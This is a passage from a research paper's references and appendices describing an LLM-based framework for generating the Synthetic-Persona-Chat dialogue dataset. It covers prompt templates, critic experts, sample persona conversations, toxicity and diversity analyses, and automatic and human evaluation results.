Aman Madaan, Niket Tandon, Prakhar Gupta, Skyler Hallinan, Luyu Gao, Sarah Wiegreffe, Uri Alon, Nouha Dziri, Shrimai Prabhumoye, Yiming Yang, Sean Welleck, Bodhisattwa Prasad Majumder, Shashank Gupta, Amir Yazdanbakhsh, and Peter Clark. 2023. Self-refine: Iterative refinement with self-feedback.
Massey et al. (2021)
Philip M Massey, Shawn C Chiang, Meredith Rose, Regan M Murray, Madeline Rockett, Elikem Togo, Ann C Klassen, Jennifer A Manganello, and Amy E Leader. 2021. Development of personas to communicate narrative-based information about the hpv vaccine on twitter. front digit health.
Mazaré et al. (2018)
Pierre-Emmanuel Mazaré, Samuel Humeau, Martin Raison, and Antoine Bordes. 2018. Training millions of personalized dialogue agents. In Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing, pages 2775–2779, Brussels, Belgium. Association for Computational Linguistics.
Mehri et al. (2022)
Shikib Mehri, Yasemin Altun, and Maxine Eskenazi. 2022. LAD: Language models as data for zero-shot dialog. In Proceedings of the 23rd Annual Meeting of the Special Interest Group on Discourse and Dialogue, pages 595–604, Edinburgh, UK. Association for Computational Linguistics.
Mehri and Eskénazi (2020)
Shikib Mehri and Maxine Eskénazi. 2020. Unsupervised evaluation of interactive dialog with dialogpt. In SIGDIAL Conferences.
Miller et al. (2017)
A. H. Miller, W. Feng, A. Fisch, J. Lu, D. Batra, A. Bordes, D. Parikh, and J. Weston. 2017. Parlai: A dialog research software platform. arXiv preprint arXiv:1705.06476.
Mündler et al. (2023)
Niels Mündler, Jingxuan He, Slobodan Jenko, and Martin T. Vechev. 2023. Self-contradictory hallucinations of large language models: Evaluation, detection and mitigation. ArXiv, abs/2305.15852.
Ouyang et al. (2022)
Long Ouyang, Jeff Wu, Xu Jiang, Diogo Almeida, Carroll L. Wainwright, Pamela Mishkin, Chong Zhang, Sandhini Agarwal, Katarina Slama, Alex Ray, John Schulman, Jacob Hilton, Fraser Kelton, Luke E. Miller, Maddie Simens, Amanda Askell, Peter Welinder, Paul Francis Christiano, Jan Leike, and Ryan J. Lowe. 2022. Training language models to follow instructions with human feedback. ArXiv, abs/2203.02155.
Pedregosa et al. (2011)
F. Pedregosa, G. Varoquaux, A. Gramfort, V. Michel, B. Thirion, O. Grisel, M. Blondel, P. Prettenhofer, R. Weiss, V. Dubourg, J. Vanderplas, A. Passos, D. Cournapeau, M. Brucher, M. Perrot, and E. Duchesnay. 2011. Scikit-learn: Machine learning in Python. Journal of Machine Learning Research, 12:2825–2830.
Pruitt and Grudin (2003a)
John Pruitt and Jonathan Grudin. 2003a. Personas: Practice and theory. In Proceedings of the 2003 Conference on Designing for User Experiences, DUX ’03, page 1–15, New York, NY, USA. Association for Computing Machinery.
Pruitt and Grudin (2003b)
John S. Pruitt and Jonathan T. Grudin. 2003b. Personas: practice and theory. In Conference on Designing for User eXperiences.
Raffel et al. (2019)
Colin Raffel, Noam M. Shazeer, Adam Roberts, Katherine Lee, Sharan Narang, Michael Matena, Yanqi Zhou, Wei Li, and Peter J. Liu. 2019. Exploring the limits of transfer learning with a unified text-to-text transformer. ArXiv, abs/1910.10683.
Schick and Schütze (2021)
Timo Schick and Hinrich Schütze. 2021. Generating datasets with pretrained language models. ArXiv, abs/2104.07540.
Shin et al. (2021)
Richard Shin, Christopher Lin, Sam Thomson, Charles Chen, Subhro Roy, Emmanouil Antonios Platanios, Adam Pauls, Dan Klein, Jason Eisner, and Benjamin Van Durme. 2021. Constrained language models yield few-shot semantic parsers. In Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing, pages 7699–7715, Online and Punta Cana, Dominican Republic. Association for Computational Linguistics.
Shum et al. (2019)
Michael Shum, Stephan Zheng, Wojciech Kryscinski, Caiming Xiong, and Richard Socher. 2019. Sketch-fill-a-r: A persona-grounded chit-chat generation framework. ArXiv, abs/1910.13008.
Shuster et al. (2022)
Kurt Shuster, Jing Xu, Mojtaba Komeili, Da Ju, Eric Michael Smith, Stephen Roller, Megan Ung, Moya Chen, Kushal Arora, Joshua Lane, Morteza Behrooz, W.K.F. Ngan, Spencer Poff, Naman Goyal, Arthur D. Szlam, Y-Lan Boureau, Melanie Kambadur, and Jason Weston. 2022. Blenderbot 3: a deployed conversational agent that continually learns to responsibly engage. ArXiv, abs/2208.03188.
Sutskever et al. (2014)
Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Sequence to sequence learning with neural networks. ArXiv, abs/1409.3215.
van Pinxteren et al. (2020)
Michelle van Pinxteren, Mark Pluymaekers, and Jos Lemmink. 2020. Human-like communication in conversational agents: a literature review and research agenda. Journal of Service Management, ahead-of-print.
Vaswani et al. (2017)
Ashish Vaswani, Noam M. Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In NIPS.
Veselovsky et al. (2023)
Veniamin Veselovsky, Manoel Horta Ribeiro, Akhil Arora, Martin Josifoski, Ashton Anderson, and Robert West. 2023. Generating faithful synthetic data with large language models: A case study in computational social science.
Wang et al. (2023a)
Boxin Wang, Weixin Chen, Hengzhi Pei, <PRESIDIO_ANONYMIZED_PERSON>, <PRESIDIO_ANONYMIZED_PERSON>, Chenhui Zhang, Chejian Xu, Zidi Xiong, Ritik Dutta, Rylan Schaeffer, Sang Truong, Simran Arora, Mantas Mazeika, Dan Hendrycks, Zi-Han Lin, Yuk-Kit Cheng, Sanmi Koyejo, Dawn Xiaodong Song, and Bo Li. 2023a. Decodingtrust: A comprehensive assessment of trustworthiness in gpt models. ArXiv, abs/2306.11698.
Wang et al. (2023b)
Xiaolei Wang, Xinyu Tang, Wayne Xin Zhao, Jingyuan Wang, and Ji-Rong Wen. 2023b. Rethinking the evaluation for conversational recommendation in the era of large language models.
Wang et al. (2021)
Zirui Wang, Adams Wei Yu, Orhan Firat, and Yuan Cao. 2021. Towards zero-label language learning. ArXiv, abs/2109.09193.
Wei et al. (2023)
Jason Wei, Xuezhi Wang, <PRESIDIO_ANONYMIZED_PERSON>, Maarten Bosma, Brian Ichter, Fei Xia, Ed Chi, Quoc Le, and Denny Zhou. 2023. Chain-of-thought prompting elicits reasoning in large language models.
Welleck et al. (2019)
Sean Welleck, Jason Weston, Arthur Szlam, and Kyunghyun Cho. 2019. Dialogue natural language inference.
Wu et al. (2019)
Chien-Sheng Wu, Andrea Madotto, Zhaojiang Lin, Peng Xu, and Pascale Fung. 2019. Getting to know you: User attribute extraction from dialogues. In International Conference on Language Resources and Evaluation.
Xu et al. (2021)
Jing Xu, Arthur Szlam, and Jason Weston. 2021. Beyond goldfish memory: Long-term open-domain conversation.
Yarowsky (1995)
David Yarowsky. 1995. Unsupervised word sense disambiguation rivaling supervised methods. In 33rd annual meeting of the association for computational linguistics, pages 189–196.
Zhang et al. (2018)
Saizheng Zhang, Emily Dinan, Jack Urbanek, Arthur D. Szlam, Douwe Kiela, and Jason Weston. 2018. Personalizing dialogue agents: I have a dog, do you have pets too? In Annual Meeting of the Association for Computational Linguistics.
Zhang et al. (2019)
Tianyi Zhang, Varsha Kishore, Felix Wu, Kilian Q. Weinberger, and Yoav Artzi. 2019. Bertscore: Evaluating text generation with bert. ArXiv, abs/1904.09675.
Zhang et al. (2020)
Yizhe Zhang, Siqi Sun, Michel Galley, Yen-Chun Chen, Chris Brockett, Xiang Gao, Jianfeng Gao, Jingjing Liu, and Bill Dolan. 2020. Dialogpt: Large-scale generative pre-training for conversational response generation.
Zhong et al. (2020)
Peixiang Zhong, Yao Sun, Yong Liu, Chen Zhang, Hao Wang, Zaiqing Nie, and Chunyan Miao. 2020. Endowing empathetic dialogue systems with personas. ArXiv, abs/2004.12316.
Zhou et al. (2019)
Li Zhou, Jianfeng Gao, Di Li, and Heung-Yeung Shum. 2019. The design and implementation of xiaoice, an empathetic social chatbot.
Zhuo et al. (2023)
Terry Yue Zhuo, Yujin Huang, Chunyang Chen, and Zhenchang Xing. 2023. Red teaming chatgpt via jailbreaking: Bias, robustness, reliability and toxicity.
Appendix A Dataset Generation Framework
In this section, we provide more details on our synthetic dataset generation framework. We created Synthetic-Persona-Chat using an LLM with 24 billion parameters. We use top-k sampling with k=40 for decoding during generation, and set the temperature value to 0.7 in all components. We give more details on user and conversation generation components in the following subsections.
A.1 User Generation
In our framework, the user generation component consists of two steps: expanding the persona attribute set, and creating realistic user profiles. In this section we provide details on our framework for these two steps:
Persona Expansion
As described in Section 3.1.1, the persona expansion step involves identifying persona categories in the initial persona attribute set Π0, generating queries associated with those categories, and bootstrapping queries to create a query set Q. In our framework, we employ the Scikit-learn Pedregosa et al. (2011) implementation of an agglomerative clustering to identify persona categories following this clustering method: we represent each persona using a BERT-based representation. Our clustering approach is bottom-up, starting with each persona attribute as an individual cluster. At each step, we combine two clusters if their similarity exceeds a predetermined threshold of 0.1. The similarity of two clusters is measured using inter-cluster average cosine similarity. The process continues until no pair of clusters is more similar than the threshold.
After identifying the clusters, we sample 3 instances of persona attributes for each cluster, and prompt the LLM using the template in shown in section 3 to construct an initial query set Q0. We expand the query set Q0 using bootstrapping. At each step, we sample 5 instances from the available queries, and prompt the LLM using the template in Table 6. We repeat this process for 100 steps. Examples of initial persona attributes, induced queries, bootstrapped queries, and bootstrapped persona attributes can be found in Table 4. The prompt templates used in this component are available in Table 6.
User Profile Generation
We illustrate a sample user profile creation process in Figure 6. As shown in the figure, at each iteration, a randomly selected persona attribute is checked for consistency and non-redundancy.
Let π′ be a randomly selected persona attribute in an iteration. For the redundancy criteria, we use the BERT representation of persona attributes. We compute the similarity of the new candidate persona attribute π′ with every persona attribute in the user profile. If it is more than a threshold (0.9 in these experiments) similar to an attribute in the user profile, π′ is deemed as redundant and will not be added to the user profile. We use the cosine similarities of the BERT representations of the persona attributes.
For the consistency criteria, we use the NLI model to verify the consistency of this persona attribute with the user profile. For every persona attribute in the current user profile π, we prompt the LLM to create the negated persona attribute ¬π. Then, we query the NLI model to check whether ¬π is inferred by π′ or ¬π′ is inferred by π. If either of these cases is inferred, then the selected persona attribute is not consistent with the user profile, and not added to the profile.
Dataset
Persona Source
Query
Example Persona Attribute
Persona-Chat
Human
What is your job?
I am a pharmacist.
Where do you live?
I live close to the coast.
Do you have any pets?
I have a doberman.
LLM
What are your talents?
I am a great listener.
What is your hair color?
My hair is auburn.
What is your favorite song?
I like the song "Leather and Lace".
Wikipedia
Human
What are your hobbies?
I spend WAY too much time on Wikipedia.
What is your view on the metric system?
I find the metric system to be a logical and efficient way to measure things.
LLM
What is the name of the first album you ever purchased?
My first album was The Miseducation of Lauryn Hill
What are you interested in?
I’m looking to learn new recipes and improve my cooking skills.
Table 4: Persona Categories and Induced Queries Using Our Framework. Queries are generated by the Large Language Model (LLM). Queries for personas with the "LLM" as source, are generated through bootstrapping, while those with "human" as source are generated by sampling persona categories and prompting the LLM. Personas with "human" as the source are authored by humans, while "LLM" rows represent personas generated using our framework.
Refer to caption
Figure 6: User Profile Construction Example
A.2 Conversation Generation
LLM-based Critic
In our framework, the critic is implemented by prompting an LLM. We included a mixture of experts approach in the critic, where each expert prompts the LLM to assess a specific policy in the candidate conversations. Our framework includes a set of experts to control the general conversation quality. We evaluate the performance of these experts using a baseline dataset. The baseline dataset for this experiment is FED which consists of 125 human-annotated instances evaluated at the conversation level. We pair the conversations and evaluate the experts based on the number of correctly ranked pairs. As shown in Table 5, we observe that these experts are more than 80% accurate in distinguishing the better conversation within the pairs. The template for the verbalized form of these experts used in our framework can be found in Table 6.
Policy Performance
Depth 0.84
Coherency 0.96
Consistency 0.92
Diversity 0.92
Likable 0.88
Table 5: List of FED Experts for Persona-Based Conversation Generation Critic. Performance is measured by the number of correctly compared conversation pairs in FED baseline based on the given policy.
Component
Template
Query Induction
What is the most specific question that you are replying to with the following statements?
{persona-category-sample-1}
{persona-category-sample-2}
{persona-category-sample-3}
Query Bootstrapping
{cluster-query-1}
…
{cluster-query-5}
Add more persona questions similar to the above examples.
Persona Bootstrapping
Imagine you are a person with the following persona.
{random-persona-attribute-1}
…
{random-persona-attribute-5}
{query}. Answer with only one short sentence that starts with ’I’ or ’My’. Do not repeat the given persona.
FED Expert
Which one of Conversation 1 and Conversation 2 between two users {policy}? Why?
Conversation 1: {conv-1}
Conversation 2: {conv-2}
Toxicity Expert
Is this conversation toxic? Why?
Conversation: {conv}
Conversation Generation
Here, we list the profiles of two users, user 1 and user 2, followed by an interesting and natural conversation between user 1 and user 2, which implicitly reflects their user profiles.
User 1 Profile: {conversation1-user-1}
User 2 Profile: {conversation1-user-2}
Conversation: {conversation-1}
…
User 1 Profile: {conversation-5-user-1}
User 2 Profile: {conversation-5-user-2}
Conversation: {conversation-5}
Give me more examples like this. The conversation must be more than 5 turns and less than 8 turns. The conversation must be natural, and not direct copies of their profiles.
User 1 Profile: {user-1}
User 2 Profile: {user-2}
Faithfulness Expert
Given user 1 and user 2’s profiles respectively, does the following conversation between the two users contradict either of their profiles? Why?
User 1 Profile: {user-1}
User 2 Profile: {user-2}
Conversation: {conv-1}
Response: {explanation}
Table 6: Prompting Templates for Large Language Models of Different Components in Our Framework. Variables enclosed in {} are filled when the template is populated.
We also included a toxicity expert and a persona faithfulness expert in the critic. The prompt templates used in these experts are available in Table 6. The persona faithfulness leverages in-context- learning capability of LLMs. It includes a few human-curated examples of faithful and unfaithful conversations in the instruction prompt. Refer to Table 7 for examples of faithful and unfaithful conversations used in the instruction prompt.
User Profiles
Conversations
Faithfulness Explanation
User 1:
One of my favorite hobbies is gaming.
I currently work in an office.
I enjoy running
User 2:
I am applying for publishing jobs.
My mother is a librarian.
The only autographs I’ve ever wanted are from authors.
I used to wear glasses as a child.
My favorite color is green.
User 1: Do you like video games?
User 2: No, I do not like video games.
User 1: What do you do for a living?
User 2: I am a librarian.
User 1: I guess that is why you like to read a lot.
User 2: Yes, I like to read books.
User 1: What is your favorite color? Mine is green.
User 2: That is my favorite color too.
User 1: That is cool.
User 2: Do you have any pets?
User 1: No, I do not have any pets.
User 2: I have a dog and a cat.
User 1: That is cool.
User 2: Do you have any hobbies?.
User 1: Yes, I like to write.
User 2: What do you write about?
User 1: I write about my life.
User 2: That is cool.
User 1: Thanks!
No, the conversation does not contradict the profiles. Neither user 1 nor user 2 says anything that contradicts their respective profiles. Although the conversation does not cover everything in their profiles, that is ok.
User 1:
I would like to move some place warmer.
I m an out of work farmhand.
I like watching reality television shows.
I live in Kansas.
User 2:
I am studying to be a dentist.
My favorite team is the raptors.
My favorite band is rise against.
I usually go to bed late.
I like sports.
User 1: It’s so cold in Kansas, I want to go some place warmer.
User 2: I am studying dentistry.
User 1: I am an out of work farmhand, I love reality tv.
User 2: I like the raptors and rise against, I go to bed late.
User 1: It is very hard to find work here, I might need to go to the city.
User 2: I don’t like sports , but I like the raptors .
User 1: I would like to work as a model, but I have no experience.
User 2: I am applying for a job as a receptionist.
User 1: I am very jealous, I hope you get it.
Yes, the conversation contradicts user 2’s profile. In the profile, user 2 says they like sports, however, in the conversation, user 2 says they don’t like sports.
User 1:
My family is from Kazakhstan.
I can speak Spanish, English, and Kazakh.
I like to go hiking on the weekends.
I play jazz piano in a band.
I am a barista.
User 2:
I am a vegan.
I love game of thrones.
I like soccer.
My brother used to be in the navy.
User 1: Hi, what do you do for a living?
User 2: I am a barista.
User 1: Awesome, me too! Where are you from?
User 2: My family is from Kazakhstan, but I was born in Uruguay.
User 1: Cool . What do you like to do in your free time?
User 2: I love to go hiking and play jazz piano.
User 1: Wow, that sounds really nice. I like to watch game of thrones and play soccer.
User 2: I have never seen game of thrones, but I love soccer.
User 1: You should watch it, it is really good.
User 2: I will check it out.
Yes, the conversation contradicts user 2’s profile. In the profile, user 2 says they love game of thrones, but in the conversation user 2 says they have never seen it.
User 1:
My favorite book is David Copperfield.
I have a twin brother.
I am really short.
I love to bake cakes.
I have won tap dance competitions.
User 2:
I enjoy spending a lot of money on my hobbies.
I love photography.
I like to use candles instead of lights.
I do not like waking up early.
User 1: Hi there! Do you like to read?
User 2: I like to read. I like to go to the library.
User 1: Oh, cool! What is your favorite book?
User 2: I really like David Copperfield. I have a twin brother and I am really short.
User 1: Are you good at baking?
User 2: I can bake cakes. I have won tap dance competitions.
User 1: Do you like photography?
User 2: I love taking pictures. I also like to use candles instead of lights.
User 1: Do you like to wake up early?
User 2: I like to sleep in. I do not like waking up early.
User 1: Do you like to spend money?
User 2: I love spending money on my hobbies.
No, the conversation does not contradict either user profiles. Although user 2 says they are really short, which is in user 1’s profile, it doesn’t mean user 2 cannot be really short too.
Table 7: Examples of Faithful and Unfaithful Conversations for Prompting the Persona Faithfulness Expert in Our Framework. The ‘Faithfulness explanation’ columns are used to fill the ‘explanation’ variable in the faithfulness expert template.
Appendix B Synthetic-Persona-Chat
Synthetic-Persona-Chat is made of 20k conversations, with an average of 11.8 turns per user for each. An example Synthetic-Persona-Chat conversation can be found in Table 8. We compare Synthetic-Persona-Chat to Persona-Chat across different dimensions. We first assess the characteristics of SPC using various automatic evaluators, i.e. evaluators which do not require human effort. We then conduct a human evaluation experiment on a subset of SPC.
User Profiles
Conversation
User 1
I am male.
My weakness are sweets.
I am unsociable.
I am a jack of all, master of none.
User 2
My favorite music is rock and roll.
I love to travel.
I am from Russia.
I enjoy skiing.
I go to school for business.
User 1: Hello
User 2: Hello, what’s your name?
User 1: My name is [name], and you?
User 2: My name is [name], I’m from Russia.
User 1: Nice to meet you, [name]. I’m from the United States.
User 2: It’s nice to meet you too, [name]. What are you interested in?
User 1: I’m interested in a lot of things, but my main interests are music and travel.
User 2: I love music too! What kind of music do you like?
User 1: I like a lot of different kinds of music, but my favorite is rock and roll.
User 2: Me too! I love classic rock and roll. Who are your favorite bands?
User 1: My favorite bands are The Beatles, The Rolling Stones, and Led Zeppelin.
User 2: Those are all great bands! I love them too.
User 1: What about you, what are your favorite bands?
User 2: My favorite bands are The Doors, Pink Floyd, and Queen.
User 1: Those are all great bands too! I love them too.
User 2: So, what do you like to do for fun?
User 1: I like to go to concerts, play video games, and watch movies.
User 2: I love going to concerts too! I also like to go skiing and play tennis.
User 1: I love skiing too! I haven’t played tennis in a while, but I used to play a lot.
User 2: We should go skiing together sometime!
User 1: That would be fun! I’m free this weekend if you are.
User 2: I’m free this weekend too! We should go skiing.
User 1: Great! I’ll text you the details.
Table 8: Sample Conversation from Synthetic-Persona-Chat. This conversation was synthesized from user profiles in Persona-Chat
B.1 Automatic Evaluation
We conduct a comprehensive analysis and evaluation of SPC across different dimensions and compare it against PC. We start by analyzing the toxicity and diversity of SPC using off the shelf tools. Then, we elaborate on the experiments which assess the efficacy of SPC used as the dataset for the next utterance prediction and the profile extraction tasks. Finally, we evaluate the quality of SPC conversations using LLM-based evaluation methods.
Toxicity Analysis
We analyze the toxicity of the generated conversations at the final iteration of SPC using an online tool called Perspective3
3
https://perspectiveapi.com/. We reproduce the results of a detailed analysis of toxicity in PC as well as in each iteration of our data generation framework while producing SPC in Table 9.
Toxicity Profanity
Confidence weak(< .2) medium(.2-.8) strong(>.8) weak(< .2) medium(.2-.8) strong(>.8)
PC 10875 4448 53 10891 1676 57
SPC Iter 1 10902 1192 3 10903 340 3
SPC Iter 2 10900 1096 1 10901 345 1
SPC Iter 3 10902 1088 1 10902 376 0
Table 9: Frequency of Toxic Conversations in Persona-Chat and Synthetic-Persona-Chat
We observe a notable reduction in the frequency of conversations deemed as strongly toxic or profane throughout the iterations of generating SPC. This reduction can be attributed to the built-in toxicity filter of the employed LLM. While PC contains more than 50 samples that are identified as strongly toxic, SPC includes at most three toxic or profane conversations, which is significantly lower (at least 15 times less). Interestingly, the fraction of conversations with medium profanity and toxicity in SPC is 4 times less than the same type of conversations in PC across all iterations. We have removed any conversation that was marked as strongly toxic by this tool in the released dataset. Samples of toxic conversations are provided in Table 10.
Source
Conversation
Persona-Chat
…
User 1: I like bloody stuff.
User 2: It reminds me of the dark which makes me afraid of it.
User 1: You are a silly goose.
Persona-Chat
…
User 2: Cool. Why do you say that? Because I am a red head?
User 1: No. Ikn. Why do you ask so many questions? Mr. Thomas is dumb.
Synthetic-Persona-Chat
User 1: I can imagine. What’s your favorite part of the job?
User 2: I love working with my team and seeing our restaurant succeed.
User 1: That’s great. What’s your least favorite part of the job?
User2: My least favorite part is dealing with my boss. He’s a real jerk.
Table 10: Examples of Toxic Conversations. The first two examples are segments of conversations from Persona-Chat. The final example is a segment from a toxic conversation in Synthetic-Persona-Chat, which has been removed in the released dataset.
Diversity Analysis
We use hierarchical topic modeling Blei et al. (2004) to assess the topic diversity of SPC and compare it to that of PC. For a fair comparison, we only compare conversations in SPC with similar personas in PC. Table 11 displays the number of topics at each level of the topic tree, with the first level indicating the most general topic. We observe similar topic diversity at the first level. In deeper levels, there is a slightly lower diversity in SPC.
Topic Level PC SPC
1 27 27
2 232 213
3 470 403
4 137 118
5 30 26
Table 11: Vertical Topic Diversity in Persona-based Datasets
Next Utterance Prediction
We compare the performance of different models on the next utterance prediction task. As discussed in Section 4.2, these models are expected to exhibit better performance in the next utterance prediction task when user personas are provided as prior information. We evaluate ranking and generative models for response selection to assess this property. We compare models trained on SPC to the same models trained on PC. We use the implementations provided in Miller et al. (2017) for the following models:
•
IR Baseline Given an utterance as a query, the IR baseline finds the most similar utterance in the training corpus using tf-idf. It defines the utterance after the most similar utterance as the candidate response, and then returns the most similar option to that candidate as the output.
•
Transformer-Ranker The context of the conversation, as well as the candidate next utterances, are encoded using a BERT-based encoder. The most similar encoded candidate to the conversation context, as measured by a dot-product in their representation space, is selected as the output Humeau et al. (2020).
•
Transformer-Generator This model is a sequence-to-sequence model Sutskever et al. (2014) which uses transformers as encoders and decoders.
Persona-Chat Synthetic-Persona-Chat
Method Metric No Persona Self Persona Their Persona Both Personas No Persona Self Persona Their Persona Both Personas
IR baseline hit@1 0.1869 0.3683 0.1519 0.3281 0.1861 0.2596 0.1882 0.2493
Transformer(Ranker) hit@1 0.2513 0.275 0.1922 0.2572 0.7164 0.6227 0.6988 0.7214
Transformer hit@1 0.0896 0.08512 0.0873 0.0813 0.0526 0.629 0.053 0.051
(Generator) ppl 65.57 72.24 62.49 64.07 5.54 5.47 5.4 5.405
Table 12: Evaluation of Next Utterance Prediction models conditioned on different user personas.
We also evaluate the performance of the next utterance prediction models when given no user, one user, and both user personas. The results of this experiment are available in Table 12. We observe that the highest performance improvement for all models trained on PC is when self-personas are given as input. We do not observe such a pattern in SPC. This indicates a higher degree of bidirectionality in SPC conversations compared to those of PC.
Profile Extraction
A potential use-case of the SPC dataset is training a model to predict user personas from a conversation. This is only possible if the dataset is highly faithful, meaning that any persona attribute inferred from the conversation is in the user profile or compatible with the user profile. In this context, a faithful conversation is expected to have high precision in the profile extraction task, while a conversation that highly reflects user personas is expected to have high recall in this task.
We evaluate the task of user profile extraction for conversations in SPC, and compare the results against those of PC. We frame the task of profile extraction as a ranking task, using the utterances within the conversations as queries. The goal is to rank a set of persona attribute options. For each conversation, we include the speakers’ persona attributes in the available options. Additionally, we select 25 random user persona attributes from other speaker profiles within the dataset to serve as distractors. The input to the profile extraction is utterances from a single user as the speaker, while the output is a list of persona attribute options for a target user, which could be either user 1 or user 2. The results of this experiment are presented in Table 13. We observe that the performance of the profile extraction methods is higher in SPC in 3 of the 4 scenarios. Interestingly, we observe that with both datasets, when the target and the speaker are different, the performance of profile extraction is greater compared to the cases when the target and speaker users are the same.
F-Score
Target Speaker PC SPC
user 1 user 1 0.505 0.574
user 1 user 2 0.737 0.68
user 2 user 1 0.50 0.57
user 2 user 2 0.456 0.494
Table 13: Accuracy of Profile Extraction in Four Different Scenarios. The ‘Target’ column represents the user profile to be extracted, while the ‘Speaker’ column indicates the speaker of the turns given to the model as input.
LLM-based Quality Evaluation
We leverage LLM-based conversation quality evaluators from the literature to compare the quality of SPC and PC. These evaluators rely on the human curated prompt templates for different metrics including consistency, fluency, etc. We used these evaluators with minimum change in the original prompt templates. These evaluators are:
•
LLM-Eval Lin and Chen (2023) is a multi-dimensional automatic evaluation designed for conversations. It uses a human-curated prompt which describes evaluation dimensions, serving as a unified evaluation schema. This prompt evaluates the conversation across multiple dimensions (e.g. fluency) in a single model call. We show this unified schema in Table 14.
•
GPT-Score Fu et al. (2023) leverages emergent abilities of LLMs, i.e. zero-shot instructions, to score texts. It contains a prompt template, and for each quality criterion, populates the template with a human description of the criteria along with the valid score range for that criteria. Example prompts are provided in Table 14.
•
G-Eval Liu et al. (2023) introduces a framework that employs LLMs with a chain-of-thought approach to assess the quality of natural language generated outputs. For any evaluation criteria, G-Eval prompts the LLM with the criterion’s description, prompting the model to generate the necessary evaluation steps. It then uses these steps to prompt the LLM to score given output for that criterion. It considers the probability of getting each permissible score as the output of the prompt, i.e., it considers the probability distribution of scores assigned by the LLM. The reported output is the expected value of the score distribution by the LLM. Table 14 includes an example prompt.
Evaluator
Metric
Prompt Template
LLM-Eval
All
Human: The output should be formatted as a JSON instance that conforms to the JSON schema below.
As an example, for the schema {"properties": {"foo": {"title": "Foo", "description": "a list of strings", "type": "array", "items": {"type": "string"}}}, "required": ["foo"]}} the object {"foo": ["bar", "baz"]} is a well-formatted instance of the schema. The object {"properties": {"foo": ["bar", "baz"]}} is not well-formatted.
Here is the output schema: {"properties": {"content": {"title": "Content", "description": "content score in the range of 0 to 100", "type": "integer"}, "grammar": {"title": "Grammar", "description": "grammar score in the range of 0 to 100", "type": "integer"}, "relevance": {"title": "Relevance", "description": "relevance score in the range of 0 to 100", "type": "integer"}, "appropriateness": {"title": "Appropriateness", "description": "appropriateness score in the range of 0 to 100", "type": "integer"}}, "required": ["content", "grammar", "relevance", "appropriateness"]}
Score the following dialogue generated on a continuous scale from {score-min} to {score-max}.
Dialogue: {dialogue}
GPT-Score
Consistency
Answer the question based on the conversation between two users.
Question: Are the responses of users consistent in the information they provide throughout the conversation? (a) Yes. (b) No.
Conversation: {dialogue} Answer:
G-Eval
Coherence
You will be given a pair of user personas. You will then be given one conversation between this persona pair.
Your task is to rate the conversation on one metric.
Please make sure you read and understand these instructions carefully. Please keep this document open while reviewing, and refer to it as needed.
Evaluation Criteria:
Coherence (1-5) - the collective quality of all utterances. We align this dimension with the Document Understanding Conference (DUC) quality question of structure and coherence (https://duc.nist.gov/duc2007/quality-questions.txt), whereby "the conversation should be well-structured and well-organized. The conversation should not just be a heap of related information, but should build from utterance to a coherent body of conversation about a topic."
Evaluation Steps:
1. Read and understand the given conversation between the pair of user personas.
2. Evaluate the conversation based on the coherence of the utterances.
3. Rate the conversation on a scale of 1 to 5, with 5 being the highest coherence and 1 being the lowest coherence.
4. Justify the rating by referring to specific aspects of the conversation that demonstrate its coherence or lack thereof.
Example:
Personas: {personas}
Conversation: {dialogue}
Evaluation Form (scores ONLY):
- Coherence:
LLM-Faithfulness
Inference
Instruction: Select User {user} persona attributes that are directly inferred from this conversation.
Contradiction
Instruction: Select User {user} persona attributes that strongly contradict this conversation.
Table 14: Prompt Templates in LLM-based Conversation Quality Evaluators. Variables enclosed in {} are filled when the template is populated.
Results of this evaluation are presented in Table 15. We observe that SPC consistently outperforms PC across all the dimensions we evaluate. The superiority of SPC is more prominent when using GPT-Score, for which each evaluated criterion shows an average improvement of at least 23 points.
Evaluator Criteria PC SPC SPC Iter 1 FED Faithfulness
LLM-Eval Lin and Chen (2023) Content 81.96 88.84 88.71 87.61 88.67
Grammar 87.12 93.64 93.68 93.09 93.56
Relevance 86.82 94.16 93.81 92.88 93.79
Appropriateness 86.99 95.84 96.17 95.68 96.19
GPT-Score Fu et al. (2023) Fluency 67.04 98.89 96.28 96.65 97.83
Consistent 3.47 64.25 50.43 43.45 48.69
Coherent 69.41 100 100 98.99 100
Depth 5.40 37.36 29.30 19.40 29.01
Diversity 72.98 96.42 94.02 92.79 94.11
Likeable 36.53 91.04 93.11 91.90 87.98
G-Eval Liu et al. (2023) Relevance (1-5) 2.288 2.992 2.986 2.941 2.99
Fluency (1-3) 1.928 2.002 2 1.998 1.999
Consistent (1-5) 1.736 2.651 2.587 2.449 2.496
Coherent (1-5) 2.505 2.997 2.997 2.991 2.998
Faithfulness (1-5) 1.754 2.959 2.8801 2.79 2.868
Table 15: Results of Automatic Evaluations of Synthetic-Persona-Chat and Persona-Chat. The "FED" column is the evaluation of the dataset generated without FED expert and the column "Faithfulness" is the evaluation results of the dataset generated without the faithfulness expert in the Critic.
B.2 Human Evaluation
We run a human evaluation of the performance of our method via a crowdsourcing platform. We conduct a Turing test, and a faithfulness study - both of which we describe in more details in the following subsections - at the end of every iteration of the generation of SPC.
Turing Test
We randomly select 200 user pairs from PC. For each example, we show the annotators the user pair, together with the corresponding conversations from PC and SPC, and ask them to select the conversation that was synthetically generated. We show an example of this crowdsourcing task in Figure 7. The results of the Turing test are available in Table 16. We report the losing rate of SPC in Turing test, and Fleiss’ Kappa to assess the inter-rater agreement. The agreement falls into the fair to moderate agreement bucket.
Refer to caption
Figure 7: Preview of the Turing Test Task on the Crowdsourcing Platform
Conversation Source % Lose κ # annotators
SPC Iter 1 17.2 0.41 50
SPC Iter 2 18.5 0.48 40
SPC Iter 3 8.8 0.22 11
SPC Iter 3* 8.04 0.56 24
SPC (LLM2) 11.5 0.49 36
Table 16: Turing test results on a sample of 200 conversations. The first column shows the percentage of SPC losing compared to PC in the Turing test. Note that the last iteration (3) of SPC is an evaluation of the segment of conversations based on the extended persona set.
Faithfulness
We present the annotators with a conversation, and a set of options of persona attributes. The annotators are asked to select the user persona attributes they would infer from the conversation. Figure 8 shows a sample of the annotation task in this study. The options include the persona attributes of the speakers in the conversation, and a set of distractor persona attributes. We created distractor persona attributes using different strategies to cover different difficulty levels. For a persona attribute set Π, we create a set ¬Π of distractor persona attributes as:
